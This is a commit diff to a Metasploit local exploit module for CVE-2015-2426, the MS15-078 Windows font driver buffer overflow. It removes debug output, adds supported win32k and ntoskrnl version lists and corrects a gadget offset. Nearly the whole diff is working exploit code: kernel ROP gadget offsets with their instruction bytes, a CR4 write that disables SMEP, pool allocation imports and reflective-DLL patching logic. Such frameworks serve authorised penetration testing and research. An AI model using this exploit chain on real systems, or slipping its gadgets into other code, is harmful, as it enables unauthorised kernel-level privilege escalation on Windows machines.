Clean template code

2015-09-12 13:43:05 -05:00 · 2015-09-12 13:43:05 -05:00 · 9626596f85
parent 53f995b9c3
commit 9626596f85
2 changed files with 15 additions and 44 deletions
--- a/data/exploits/CVE-2015-2426/reflective_dll.x64.dll
+++ b/data/exploits/CVE-2015-2426/reflective_dll.x64.dll
--- a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
+++ b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
@ -10,6 +10,17 @@ require 'rex'
 class Metasploit3 < Msf::Exploit::Local
  Rank = ManualRanking

+  WIN32K_VERSIONS = [
+    '6.3.9600.17393',
+    '6.3.9600.17837',
+    '6.3.9600.17915'
+  ]
+
+  NT_VERSIONS = [
+    '6.3.9600.17415',
+    '6.3.9600.17936'
+  ]
+
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
@ -65,46 +76,32 @@ class Metasploit3 < Msf::Exploit::Local
    @win32k_offsets.each do |k, v|
      case k
      when 'info_leak'
-        puts "patching ! #{Rex::Text.to_hex_dump([v].pack('Q<'))}"
        dll.gsub!([0xdeedbeefdeedbe00].pack('Q<'), [v].pack('Q<'))
      when 'pop_rax_ret'
-        puts "patching 1 ! #{Rex::Text.to_hex_dump([v].pack('Q<'))}"
        dll.gsub!([0xdeedbeefdeedbe01].pack('Q<'), [v].pack('Q<'))
      when 'xchg_rax_rsp'
-        puts "patching 2 ! #{Rex::Text.to_hex_dump([v].pack('Q<'))}"
        dll.gsub!([0xdeedbeefdeedbe02].pack('Q<'), [v].pack('Q<'))
      when 'allocate_pool'
-        puts "patching 3 ! #{Rex::Text.to_hex_dump([v].pack('Q<'))}"
        dll.gsub!([0xdeedbeefdeedbe03].pack('Q<'), [v].pack('Q<'))
      when 'pop_rcx_ret'
-        puts "patching 4 ! #{Rex::Text.to_hex_dump([v].pack('Q<'))}"
        dll.gsub!([0xdeedbeefdeedbe04].pack('Q<'), [v].pack('Q<'))
      when 'deref_rax_into_rcx'
-        puts "patching 5 ! #{Rex::Text.to_hex_dump([v].pack('Q<'))}"
        dll.gsub!([0xdeedbeefdeedbe05].pack('Q<'), [v].pack('Q<'))
      when 'mov_rax_into_rcx'
-        puts "patching 6 ! #{Rex::Text.to_hex_dump([v].pack('Q<'))}"
        dll.gsub!([0xdeedbeefdeedbe06].pack('Q<'), [v].pack('Q<'))
      when 'pop_rbx_ret'
-        puts "patching 7 ! #{Rex::Text.to_hex_dump([v].pack('Q<'))}"
        dll.gsub!([0xdeedbeefdeedbe07].pack('Q<'), [v].pack('Q<'))
      when 'ret'
-        puts "patching 8 ! #{Rex::Text.to_hex_dump([v].pack('Q<'))}"
        dll.gsub!([0xdeedbeefdeedbe08].pack('Q<'), [v].pack('Q<'))
      when 'mov_rax_r11_ret'
-        puts "patching 9 ! #{Rex::Text.to_hex_dump([v].pack('Q<'))}"
        dll.gsub!([0xdeedbeefdeedbe09].pack('Q<'), [v].pack('Q<'))
      when 'add_rax_rcx_ret'
-        puts "patching a ! #{Rex::Text.to_hex_dump([v].pack('Q<'))}"
        dll.gsub!([0xdeedbeefdeedbe0a].pack('Q<'), [v].pack('Q<'))
      when 'pop_rsp_ret'
-        puts "patching b ! #{Rex::Text.to_hex_dump([v].pack('Q<'))}"
        dll.gsub!([0xdeedbeefdeedbe0b].pack('Q<'), [v].pack('Q<'))
      when 'xchg_rax_rsp_adjust'
-        puts "patching c ! #{Rex::Text.to_hex_dump([v].pack('Q<'))}"
        dll.gsub!([0xdeedbeefdeedbe0c].pack('Q<'), [v].pack('Q<'))
      when 'chwnd_delete'
-        puts "patching d ! #{Rex::Text.to_hex_dump([v].pack('Q<'))}"
        dll.gsub!([0xdeedbeefdeedbe0d].pack('Q<'), [v].pack('Q<'))
      end
    end
@ -115,33 +112,19 @@ class Metasploit3 < Msf::Exploit::Local
      case version
      when '6.3.9600.17393'
        {
-          # 0xdeedbeefdeedbe00
          'info_leak'           => 0x3cf00,
-          # 0xdeedbeefdeedbe01
          'pop_rax_ret'         => 0x19fab,  # pop rax # ret # 58 C3
-          # 0xdeedbeefdeedbe02
          'xchg_rax_rsp'        => 0x6121,   # xchg eax, esp # ret # 94 C3
-          # 0xdeedbeefdeedbe03
          'allocate_pool'       => 0x352220, # import entry nt!ExAllocatePoolWithTag
-          # 0xdeedbeefdeedbe04
          'pop_rcx_ret'         => 0x98156,  # pop rcx # ret # 59 C3
-          # 0xdeedbeefdeedbe05
          'deref_rax_into_rcx'  => 0xc432f,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
-          # 0xdeedbeefdeedbe06
-          'mov_rax_into_rcx'    => 0xc432f,  # mov [rcx], rax # ret # 48 89 01 C3
-          # 0xdeedbeefdeedbe07
+          'mov_rax_into_rcx'    => 0xc4332,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14db,   # pop rbx # ret # 5B C3
-          # 0xdeedbeefdeedbe08
          'ret'                 => 0x6e314,  # ret C3
-          # 0xdeedbeefdeedbe09
          'mov_rax_r11_ret'     => 0x7018e,  # mov rax, r11 # ret # 49 8B C3 C3
-          # 0xdeedbeefdeedbe0a
          'add_rax_rcx_ret'     => 0xee38f,  # add rax, rcx # ret # 48 03 C1 C3
-          # 0xdeedbeefdeedbe0b
          'pop_rsp_ret'         => 0xbc8f,   # pop rsp # ret # 5c c3
-          # 0xdeedbeefdeedbe0c
          'xchg_rax_rsp_adjust' => 0x189a3a, # xchg esp, eax # sar bh, cl # add rsp, 0x80 # pop rbx # ret # 94 1C 00 8B C3 48 83 c4 20 5b c3
-          # 0xdeedbeefdeedbe0d
          'chwnd_delete'        => 0x165010  # CHwndTargetProp::Delete
        }
      when '6.3.9600.17837'
@ -186,10 +169,8 @@ class Metasploit3 < Msf::Exploit::Local
    @nt_offsets.each do |k, v|
      case k
      when 'set_cr4'
-        puts "patching e ! #{Rex::Text.to_hex_dump([v].pack('Q<'))}"
        dll.gsub!([0xdeedbeefdeedbe0e].pack('Q<'), [v].pack('Q<'))
      when 'allocate_pool_with_tag'
-        puts "patching f ! #{Rex::Text.to_hex_dump([v].pack('Q<'))}"
        dll.gsub!([0xdeedbeefdeedbe0f].pack('Q<'), [v].pack('Q<'))
      end
    end
@ -200,9 +181,7 @@ class Metasploit3 < Msf::Exploit::Local
      case version
      when '6.3.9600.17415'
        {
-          # 0xdeedbeefdeedbe0e
          'set_cr4'                => 0x38a3cc, # 0F 22 E0 48 83 C4 28 C3
-          # 0xdeedbeefdeedbe0f
          'allocate_pool_with_tag' => 0x2a3a50
        }
      when '6.3.9600.17936'
@ -265,25 +244,17 @@ class Metasploit3 < Msf::Exploit::Local
    # win32k.sys 6.3.9600.17393 => Works
    @win32k = win32k_version

-    unless @win32k && @win32k =~ /^6\.3/
-      return Exploit::CheckCode::Unknown
-    end
-
-    unless @win32k && Gem::Version.new(@win32k) == Gem::Version.new('6.3.9600.17393')
+    unless @win32k && WIN32K_VERSIONS.include?(@win32k)
      return Exploit::CheckCode::Detected
    end

    # ntoskrnl.exe 6.3.9600.17415 => Works
    @ntoskrnl = ntoskrnl_version

-    unless @ntoskrnl && @ntoskrnl =~ /^6\.3/
+    unless @ntoskrnl && NT_VERSIONS.include?(@ntoskrnl)
      return Exploit::CheckCode::Unknown
    end

-    unless @ntoskrnl && Gem::Version.new(@ntoskrnl) == Gem::Version.new('6.3.9600.17415')
-      return Exploit::CheckCode::Detected
-    end
-
    Exploit::CheckCode::Appears
  end

@ -293,7 +264,7 @@ class Metasploit3 < Msf::Exploit::Local
    end

    check_result = check
-    if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown
+    unless check_result == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
    end